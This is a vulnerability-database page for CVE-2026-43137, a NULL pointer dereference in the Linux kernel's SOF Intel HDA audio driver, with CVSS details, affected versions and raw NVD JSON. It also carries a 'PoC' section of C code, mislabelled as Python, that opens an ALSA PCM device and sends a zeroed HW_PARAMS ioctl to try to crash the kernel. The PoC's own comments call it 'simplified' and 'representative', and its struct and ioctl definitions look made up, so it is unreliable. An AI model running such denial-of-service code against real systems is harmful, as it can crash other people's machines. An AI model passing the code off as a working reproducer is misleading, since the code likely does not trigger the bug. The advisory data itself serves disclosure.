Security Vulnerability Report
中文
CVE-2026-43137 CVSS 5.5 MEDIUM

CVE-2026-43137

Published: 2026-05-06 12:16:31
Last Modified: 2026-05-12 21:15:52
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: ASoC: SOF: Intel: hda: Fix NULL pointer dereference If there's a mismatch between the DAI links in the machine driver and the topology, it is possible that the playback/capture widget is not set, especially in the case of loopback capture for echo reference where we use the dummy DAI link. Return the error when the widget is not set to avoid a null pointer dereference like below when the topology is broken. RIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common]

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel (修复前版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for CVE-2026-43137: Kernel Null Pointer Dereference in SOF Intel HDA * This PoC demonstrates the trigger condition for the NULL pointer dereference. * It attempts to setup a stream that relies on a missing widget. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // Simplified definitons for the sake of the PoC #define SND_PCM_IOCTL_HW_REFINE 0x40104110 #define SND_PCM_IOCTL_HW_PARAMS 0x41104111 struct snd_pcm_hw_params { unsigned int flags; unsigned int masks[8]; unsigned int mvals[4]; unsigned int rmask; unsigned int cmask; unsigned int info; unsigned int msbits; unsigned int rate_num; unsigned int rate_den; unsigned int periods; unsigned int buffer_size; }; int main() { int fd; struct snd_pcm_hw_params params; // Attempt to open the PCM device (e.g., default or hw:0,0) // The specific device depends on the hardware using the Intel HDA driver fd = open("/dev/snd/pcmC0D0p", O_RDWR | O_NONBLOCK); if (fd < 0) { perror("Failed to open audio device"); return -1; } printf("Device opened. Attempting to trigger vulnerability via topology mismatch...\n"); // Zero out params to simulate invalid/broken topology configuration // In a real exploit scenario, specific parameters would be set to trigger // the code path where the widget is NULL. memset(&params, 0, sizeof(params)); // Trigger the ioctl that calls into the faulty hda_dai_get_ops function // This is a representative call; the actual trigger may require specific // stream setups or topology loading. if (ioctl(fd, SND_PCM_IOCTL_HW_PARAMS, &params) < 0) { perror("Ioctl failed (expected if crash did not occur immediately)"); } close(fd); printf("PoC execution finished.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43137", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:31.007", "lastModified": "2026-05-12T21:15:52.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: SOF: Intel: hda: Fix NULL pointer dereference\n\nIf there's a mismatch between the DAI links in the machine driver and\nthe topology, it is possible that the playback/capture widget is not\nset, especially in the case of loopback capture for echo reference\nwhere we use the dummy DAI link. Return the error when the widget is not\nset to avoid a null pointer dereference like below when the topology is\nbroken.\n\nRIP: 0010:hda_dai_get_ops.isra.0+0x14/0xa0 [snd_sof_intel_hda_common]"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.12.75", "matchCriteriaId": "CAA073DB-607E-4D74-9B88-0379E8C760F6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/10411f1f2c76be67103b1f95822ff629aa25e2aa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/16c589567a956d46a7c1363af3f64de3d420af20", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/42068f7dd42b559c4eeae645e1455ff36518866a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7750d78b4014902bc0ac03d4bb30faa076a913ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.